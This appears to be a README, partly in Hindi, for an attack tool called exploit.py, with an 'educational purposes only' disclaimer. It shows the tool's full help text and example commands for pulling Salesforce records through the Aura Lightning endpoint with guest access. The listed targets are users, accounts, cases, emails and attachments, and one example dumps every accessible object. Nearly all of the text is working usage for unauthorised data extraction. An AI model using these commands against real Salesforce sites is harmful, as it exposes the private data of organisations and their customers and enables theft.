
केवल शैक्षणिक उद्देश्यों के लिए। अतिथि विशेषाधिकार के साथ Salesforce Lightning पर हमला।
केवल शैक्षणिक उद्देश्यों के लिए।
यह टूल अतिथि विशेषाधिकार के साथ Aura lightning endpoint के माध्यम से Salesforce object का डेटा डंप करता है।
यह अस्त-व्यस्त कोड है, पर माफ कर दो।
$ python3 exploit.py -h
usage: exploit.py [-h] -u URL [-o [OBJECTS [OBJECTS ...]]] [-l] [-c]
[-a AURA_CONTEXT] [-r RECORD_ID] [-d] [-f] [-s]
Exploit Salesforce through the aura endpoint with the guest privilege
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL set the SITE url. e.g. http://url/site_path
-o [OBJECTS [OBJECTS ...]], --objects [OBJECTS [OBJECTS ...]]
set the object name. Default value is "User" object.
Juicy Objects: Case,Account,User,Contact,Document,Cont
entDocument,ContentVersion,ContentBody,CaseComment,Not
e,Employee,Attachment,EmailMessage,CaseExternalDocumen
t,Attachment,Lead,Name,EmailTemplate,EmailMessageRelat
ion
-l, --listobj pull the object list.
-c, --check only check aura endpoint
-a AURA_CONTEXT, --aura_context AURA_CONTEXT
set your valid aura_context
-r RECORD_ID, --record_id RECORD_ID
set the recode id to dump the record
-d, --dump_objects dump a small number of objects accessible to guest
users and saves them in the file.
-f, --full if set with -d, dump all pages of objects.
-s, --skip if set with -d, skip the objects already dumped.
# just list objects
$ python3 exploit.py -u https://domain.force.com/path/ -l
# show User and Account object
$ python3 exploit.py -u https://domain.force.com/path/ -o User Account
# save all objects(only page 1)
$ python3 exploit.py -u https://domain.force.com/path/ -d -s